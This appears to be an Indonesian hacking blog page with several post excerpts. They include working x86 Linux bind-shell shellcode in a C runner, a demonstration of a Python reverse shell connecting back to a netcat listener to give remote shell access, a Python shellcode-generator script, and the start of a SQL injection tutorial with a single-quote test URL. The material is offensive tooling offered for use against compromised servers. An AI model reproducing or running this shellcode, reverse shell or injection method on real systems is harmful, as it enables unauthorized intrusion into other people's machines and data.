iseng nyoba

#include <stdio.h>
char shell[] = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80"
"\x96\x43\x52\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x66\x58\x50"
"\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
"\x43\x89\xe1\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89"
"\xdf\xff\xe1";
int main(void) {
       ((void (*)(void))shell)(); // str()
        return 0;
}

scan:

root@deepmind:~# nmap localhost

Starting Nmap 5.00 ( http://nmap.org ) at 2010-10-15 08:51 WIT
Interesting ports on localhost (127.0.0.1):
Not shown: 999 closed ports
PORT      STATE SERVICE
12345/tcp open  netbus

Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds

reverse shell written in python

sedikit hasil coding dengan cara seksama dan dalam tempo yang sesingkat2nya 🙂 , reverse shell, bisa digunakan dan dikembangkan sebagai alternatif jika bertemu pwned server yang didisable untuk php shell 🙂

untuk penggunaanya disiapkan dulu listening port nya, misal:

nc -l 12345

contoh penggunaan:
di box kita:

r3dsh4d0w@deepmind:~$ nc -l 12345

di box yang mengeksekusi reverseshell:

akfsec@Indonesia:~/program/python$ id
uid=1000(akfsec) gid=1000(akfsec) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(akfsec)
akfsec@Indonesia:~/program/python$ ./reverseshell.py 192.168.1.2 12345

hasil di box listen:

r3dsh4d0w@deepmind:~$ nc -l 12345
w00t!!, succesfully connected
please wait while getting the prompt
Enjoy dude...
id    
uid=1000(akfsec) gid=1000(akfsec) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(akfsec)

untuk sourcenya:
Read more of this post

shellcode maker written in python

hello world… iseng iseng cari referensi tentang shellcoding, eh.. akhirnya mengisengkan diri untuk membuat program untuk otomatisasi membuat shellcode dari source.asm, berikut sourcecodenya, silahkan dikembangkan…

#!/usr/bin/env python
import os, sys, time
os.system("clear")
def banner():
    print "###################################################################"
    print "___________________________________________________________________"
    print "________/__\_|_|__/__//_______/__________________|__|______________"
    print "_______/___ \|_|_/__//__/_____/_____/_/_____\____|__|_/_____\______"
    print "______/__/\__|_|/__//______\_/__/____/__/\___\/_____|/______/______"
    print "_____/__/__\_|___<__\__\_____\__\____\__\/___/__/___|__<___________"
    print "____(________|_|\__\_\__\_____\_____\_\_____/\_______\_____\_______"
    print "_____________\_|_\__\_\__\_________________________________________"
    print "______________\/__\__\_________shellcode generator v.1_____________"
    print "_______________________________coder: -AKF-________________________"
    print "_______________________________requirements: linux, nasm, gcc______"
    print "_______________________________target : intel-32___________________"
    print "___________________________________________________________________"
    print "###################################################################"

if len(sys.argv) <= 1:
    banner()
    print "[+]usage: ./" + sys.argv[0] + " source.asm"   
    print "[+]ex: ./" + sys.argv[0] + " testshell.asm"
    sys.exit(1)

banner()
akf = sys.argv[1]
egg = akf[:-4]
greenblack="nasm -f elf " + akf
dop="ld -o egg"+ " " + egg + ".o"
print "[+]please wait while processing your program"
os.system(greenblack)
time.sleep(3)
print "[+]almost D0ne..."
os.system(dop)
time.sleep(3)	
print "[+]D0ne!!, the shellcode is:"
print ""
print "<-------save the code below in .c-------->"
print ""
print "//shellcode generator v.1"
print "//coder: -AKF- a.k.a redshadow"
print "//underattacks security research"
print "//akfcode"
print "#include <stdio.h>"
print "char shellcode[]="
minal = "egg"
lakov = "objdump -d ./"
qolbu = "|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\\t' ' '|sed 's/ $//g'|sed 's/ /\\\\x/g'|paste -d '' -s |sed 's/^/\"/'|sed 's/$/\"/g'"
likov = lakov+minal+qolbu
os.system(likov)
print ";"
print "int main(void) {"
print "((void (*)(void))shellcode)();"
print "return 0;"
print "}"
print ""
print "<----------------- EOF ------------------->"
print ""
print "[+]thanks for using!!!"
brengos = "rm egg"
masje = "rm " + egg + ".o"
os.system(brengos)
os.system(masje)

dan berikut contoh penggunaanya:
Read more of this post

cara cepat melakukan SQL injection mysql v.5

SQL injection merupakan sebuah tehnik hacking yang paling banyak digunakan, karena dari sebuah bug yang dilakukan seorang programmer dimana terdapat bug SQLi ini bukannya tidak mungkin sebuah server akan dapat dikuasai oleh attacker, untuk lebih jelas tentang apakah SQLi ini silahkan search di google, baik langsung saja untuk melakukan SQLi ini tentu saya sebuah target yang vulnerable terhadap SQLi dan langkah – langkahnya adalah sebagai berikut

1. test bug
bisa dilakukan dengan memberikan single quote(petik tunggal) pada url yang terdapat bug, contoh url adalah http://target.com/menu.php?id=1 , maka berikan single quote dibelakangnya sehingga menjadi:

http://target.com/menu.php?id=1'

Read more of this post